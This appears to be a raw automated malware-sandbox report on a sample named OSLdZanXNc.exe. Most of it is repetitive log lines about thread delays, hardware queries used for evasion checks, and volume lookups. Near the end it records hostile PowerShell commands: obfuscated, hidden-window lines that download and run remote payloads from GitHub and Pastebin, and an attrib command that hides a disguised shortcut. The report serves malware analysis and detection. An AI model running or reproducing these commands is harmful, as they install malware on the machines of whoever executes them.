Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3196Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3391Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5096Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4641Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 814Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4416Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5397Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1657
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3982
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5820
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7040Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6992Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6168Thread sleep time: -19369081277395017s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6216Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6832Thread sleep count: 814 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6256Thread sleep count: 295 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5992Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6844Thread sleep count: 4416 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6920Thread sleep count: 5397 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6960Thread sleep time: -24903104499507879s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7100Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1888Thread sleep count: 1657 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4688Thread sleep count: 183 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2088Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5368Thread sleep count: 3982 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 692Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1856Thread sleep count: 5820 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3328Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 00000010.00000002.2922437661.000001D621E00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
Source: powershell.exe, 00000004.00000002.2601758086.0000024220540000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2819373570.000001C72A5A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF674C52370 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF674C52370
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF674C52514 SetUnhandledExceptionFilter,0_2_00007FF674C52514
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF674C51E94 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF674C51E94
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF674C52370 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF674C52370
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
